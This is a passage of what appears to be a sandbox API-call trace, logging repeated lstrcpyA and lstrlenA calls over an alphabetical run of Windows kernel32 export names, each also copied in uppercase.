lpString1=0x3f2ca78, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0080.359] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0080.359] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0080.359] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0080.359] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0080.359] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0080.359] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0080.359] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0080.359] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0080.359] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0080.359] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0080.359] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0080.359] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0080.359] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0080.359] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0080.359] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0080.359] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0080.360] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0080.360] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0080.360] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0080.360] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0080.360] lstrlenA (lpString="BACKUPREAD") returned 10 [0080.360] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0080.360] lstrlenA (lpString="BACKUPSEEK") returned 10 [0080.360] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0080.360] lstrlenA (lpString="BACKUPWRITE") returned 11 [0080.360] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0080.360] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0080.360] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0080.360] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0080.360] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0080.360] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0080.360] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0080.360] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0080.360] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0080.360] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0080.360] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0080.360] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0080.360] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0080.360] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0080.360] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0080.360] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0080.360] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0080.360] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0080.360] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0080.360] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0080.360] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0080.360] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0080.360] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0080.360] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0080.360] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0080.360] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0080.360] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0080.361] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0080.361] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0080.361] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0080.361] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0080.361] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0080.361] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0080.361] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0080.361] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0080.361] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0080.361] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0080.361] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0080.361] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0080.361] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0080.361] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0080.361] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0080.361] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0080.361] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0080.361] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0080.361] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0080.361] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0080.361] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0080.361] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0080.361] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0080.361] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0080.361] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0080.361] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0080.361] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0080.361] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0080.361] lstrlenA (lpString="BEEP") returned 4 [0080.361] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0080.361] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0080.361] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0080.361] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0080.361] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0080.361] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0080.361] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0080.362] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0080.362] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0080.362] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0080.362] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0080.362] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0080.362] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0080.362] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0080.362] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0080.362] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0080.362] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0080.362] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0080.362] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0080.362] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0080.362] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0080.362] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0080.362] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0080.362] lstrlenA (lpString="CANCELIO") returned 8 [0080.362] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0080.362] lstrlenA (lpString="CANCELIOEX") returned 10 [0080.362] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0080.362] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0080.362] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0080.362] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0080.362] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0080.362] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0080.362] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0080.362] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0080.362] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0080.362] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0080.362] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0080.362] lstrlenA (lpString="CHECKELEVATION") returned 14 [0080.362] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0080.362] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0080.362] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0080.362] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0080.362] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0080.362] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0080.363] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0080.363] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0080.363] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0080.363] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0080.363] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0080.363] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0080.363] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0080.363] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0080.363] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0080.363] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0080.363] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0080.363] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0080.363] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0080.363] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0080.363] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0080.363] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0080.363] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0080.363] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0080.363] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0080.363] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0080.363] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0080.363] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0080.363] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0080.363] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0080.363] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0080.363] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0080.363] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0080.363] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0080.363] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0080.363] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0080.363] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0080.363] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0080.363] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0080.363] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0080.363] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0080.363] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0080.363] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0080.363] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0080.364] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0080.364] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0080.364] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0080.364] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0080.364] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0080.364] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0080.364] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0080.364] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0080.364] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0080.364] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0080.364] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0080.364] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0080.364] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0080.364] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0080.364] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0080.364] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0080.364] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0080.364] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0080.364] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0080.364] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0080.364] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0080.364] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0080.364] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0080.364] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0080.364] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0080.364] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0080.364] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0080.364] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0080.364] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0080.364] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0080.364] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0080.364] lstrlenA (lpString="COPYCONTEXT") returned 11 [0080.364] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0080.364] lstrlenA (lpString="COPYFILEA") returned 9 [0080.364] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0080.364] lstrlenA (lpString="COPYFILEEXA") returned 11 [0080.365] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0080.365] lstrlenA (lpString="COPYFILEEXW") returned 11 [0080.365] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0080.365] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0080.365] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0080.365] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0080.365] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0080.365] lstrlenA (lpString="COPYFILEW") returned 9 [0080.365] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0080.365] lstrlenA (lpString="COPYLZFILE") returned 10 [0080.365] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0080.365] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0080.365] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0080.365] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0080.365] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0080.365] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0080.365] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0080.365] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0080.365] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0080.365] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0080.365] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0080.365] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0080.365] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0080.365] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0080.365] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0080.365] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0080.365] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0080.365] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0080.365] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0080.365] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0080.365] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0080.365] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0080.365] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0080.365] lstrlenA (lpString="CREATEEVENTA") returned 12 [0080.365] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0080.365] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0080.366] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0080.366] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0080.366] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0080.366] lstrlenA (lpString="CREATEEVENTW") returned 12 [0080.366] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0080.366] lstrlenA (lpString="CREATEFIBER") returned 11 [0080.366] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0080.366] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0080.366] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0080.366] lstrlenA (lpString="CREATEFILEA") returned 11 [0080.366] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0080.366] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0080.366] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") 